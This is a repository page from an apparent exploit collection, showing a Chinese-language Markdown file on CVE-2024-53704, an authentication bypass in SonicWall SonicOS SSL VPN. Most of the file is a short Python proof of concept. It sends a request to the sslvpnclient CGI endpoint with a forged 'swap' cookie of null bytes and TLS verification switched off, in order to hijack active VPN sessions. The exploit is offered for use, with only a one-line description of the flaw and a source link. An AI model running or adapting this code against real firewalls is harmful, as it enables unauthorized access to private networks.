admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/SonicWall/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

23 lines
744 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704)
**SonicWall防火墙的身份验证旁路允许远程攻击者劫持Active SSL SSL VPN会话并获得未经授权的网络访问Sononicos版本7.1.x7.1.1-7058及以上7.1.2-7019和8.0.0-8035受到影响**
## poc
```python
import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
resp = requests.get(
"https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
cookies={"swap": base64.b64encode(b"\x00" * 32).decode()},
verify=False
)
print(resp.headers)
print(resp.body)
```
## 漏洞来源
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
Reference in New Issue View Git Blame Copy Permalink